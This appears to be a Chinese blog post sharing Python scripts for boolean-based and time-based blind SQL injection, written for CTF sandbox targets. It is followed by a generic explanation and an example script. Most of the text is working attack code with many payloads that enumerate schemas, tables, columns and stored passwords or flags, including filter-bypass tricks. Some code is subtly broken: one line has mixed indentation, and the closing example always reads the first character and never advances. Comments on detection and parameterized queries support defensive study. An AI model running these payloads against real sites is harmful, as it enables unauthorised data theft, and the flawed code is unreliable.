sql盲注py脚本

# Boolean-based blind SQL injection script (CTF practice; the hosts below are challenge sandboxes).
# Each character of the target string is recovered with a binary search over the
# printable ASCII range 32..127; every search step is one HTTP GET, and the presence
# of 'query_success' in the response body is the yes/no oracle. That is at most
# 7 requests per character and up to 49 characters per row.
# Defender's view: the traffic signature is a burst of GETs to one endpoint whose
# query string carries substr()/ord()/ascii() with a steadily changing integer and,
# in the commented variants, information_schema lookups. Parameterized queries
# remove the injection point; a least-privilege DB account limits what such a
# probe can read.
import requests
#url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
#url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-8001a3f6b43953f3.sandbox.ctfhub.com:10080/"  # base URL; the payload string is appended verbatim
result = ''  # all characters recovered so far, rows separated by the marker added below

# Assumes roughly 10 rows; each is read with its own LIMIT offset (group_concat would repeat data)
for code in range(0, 10):  # `code` is the LIMIT offset of the row being read
    result += " --- next limit data : "    
    # Character positions 1..49 of the current row (1-based, as substr() expects)
    for x in range(1, 50):    
    #for x in range(70, 100):
        high = 127  # upper bound of the search range (inclusive ASCII code)
        low = 32    # lower bound; a result of 32 is later treated as end-of-string
        mid = (low + high) // 2
        # Binary search: each iteration asks the server "is the code point > mid?"
        # and narrows [low, high] until a single value remains.
        while high > low:
        # load_file out-of-band variant
        #payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
            # database name
            #payload = "and ascii(substr((select database()),%d,1))>%d--+" % (x, mid)
            # table name
            #payload = "and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d --+" % (code,x, mid)
            # column name
            #payload = "and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d --+" % (code,x, mid)
            # adjust to the target; 'and' was filtered here
            # The three assignments below are overwritten by the one after them and are never sent.
            payload = "?id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
            payload = "?id=if(ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)
            payload = "?id=if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,(select table_name from information_schema.tables))" % (code, x, mid)

	    # 'and', space and 'if' were filtered (hence the two XORs; author unsure why)
	    #payload = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(x,mid)
	    # schema names
	    #payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(x, mid)
	    # table names
	    #payload = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(x,mid)
	    # table names
	    #payload = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(x,mid)
	    # column names
	    # NOTE(review): this is the only assignment that reaches requests.get(); unlike the
	    # ones above it carries no "?id=" prefix, and the line is indented with a tab followed
	    # by spaces while the surrounding block uses spaces only.
	    payload = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(x, mid)
            #print(payload)

            response = requests.get(url + payload)  # one request per search step
            if 'query_success' in response.text:  # oracle says "true": code point is above mid
                low = mid + 1
            else:                                  # "false": code point is at or below mid
                high = mid
            mid = (low + high) // 2
            print(mid)  # progress: current midpoint of the shrinking range
        result += chr(mid)  # low == high here: the recovered code point
        if (mid == 32):  # search collapsed to the lower bound: taken as the end of this row's string
            print(result)
            break;
        print("[*] the name are {0}".format(result))
#其他函数
#ascii可用ord替换,substr用mid
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
#正则
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'
#IF(expr1,expr2,expr3)
#if(ascii(substr(database(),1,1))>115,0,sleep(5))--+
# Time-based blind SQL injection script (CTF practice; the hosts below are challenge sandboxes).
# Same binary search as the boolean variant, but the oracle is wall-clock time:
# the injected IF() runs sleep(5) when the condition is false, and a reply that
# arrives in under 4 seconds is read as "true". Latency above 4 s on a genuine
# "true" reply is therefore misread.
# Defender's view: every false answer costs the server a 5-second sleep, so the
# probe shows as a burst of GETs to one endpoint with sleep( in the query string
# and a sharply bimodal response-time distribution; slow-query and access logs both
# expose it. Parameterized queries remove the injection point.
import requests
import time
# Three assignments in a row: only the last value of `url` is used.
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
url = "http://localhost/sqli-labs-master/Less-1/?id=1'"
url = "http://challenge-4209e5f8252d6563.sandbox.ctfhub.com:10080/"  # base URL; the payload string is appended verbatim
result = ''  # all characters recovered so far
for code in range(0,10):  # `code` is the LIMIT offset of the row being read
    # Character positions 7..49 of the row; the range starts at 7 rather than 1,
    # presumably to resume an earlier run -- confirm before reuse.
    for x in range(7, 50):
        high = 127  # upper bound of the search range (inclusive ASCII code)
        low = 32    # lower bound; a result of 32 is later treated as end-of-string
        mid = (low + high) // 2
        # Binary search driven by response time; each iteration is one HTTP GET.
        while high > low:
            # load_file out-of-band variant
            #payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
            # database name
            #payload = "?id=1 and if(ascii(substr(database(),%d,1))>%d,1,sleep(5))--+" % (x, mid)
            # table name
            # Overwritten by the assignment further down; never sent.
            payload = "?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
            # column name
            #payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
            # field value -- this is the payload that is actually sent
            payload = "?id=1 and if(ascii(substr((select flag from flag limit %d,1),%d,1))>%d,1,sleep(5)) --+" % (code, x, mid)
            #print(payload)
            #payload = "?id=1 and if(1=1,1,sleep(10))--+"   # (commented) presumably a baseline request for the timing oracle
            ss = time.time()  # start of the round trip
            response = requests.get(url + payload)  # the body is never inspected; only the elapsed time matters
            if time.time() - ss < 4:  # fast reply: sleep(5) did not fire, code point is above mid
                low = mid + 1
            else:                      # slow reply: sleep(5) fired, code point is at or below mid
                high = mid
            mid = (low + high) // 2
            print(mid)  # progress: current midpoint of the shrinking range
        result += chr(mid)  # low == high here: the recovered code point
        if (mid == 32):  # search collapsed to the lower bound: taken as the end of this row's string
            print(result)
            break;
        print("[*] the name are {0}".format(result))
#其他函数
#ascii可用ord替换,substr用mid
#?id=-1' or ascii(substr((select database() limit 0,1),1,1))>111--+
#?id=-1'%20or%20left(database(),2)='se'%20--+
#正则
#?id=-1'or%20(database()%20regexp%20'^sec')=1--+
#select user like 'ro%'
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。

下面是一个使用Python编写的简单SQL注入盲注脚本的示例:

```python
import requests

def check_vulnerable(url):
    payload = "' OR 1=1 --"
    response = requests.get(url + "?id=" + payload)
    if "Welcome" in response.text:
        return True
    else:
        return False

def exploit_blind(url):
    result = ""
    characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        found = False
        for char in characters:
            payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --"
            response = requests.get(url + "?id=" + payload)
            if "Welcome" in response.text:
                result += char
                found = True
                break
        if not found:
            break
    return result

# 示例使用方法
url = "http://example.com/vulnerable_page"
if check_vulnerable(url):
    database_name = exploit_blind(url)
    print("数据库名称:", database_name)
else:
    print("目标网站不易受SQL注入攻击")
```

上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。

请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。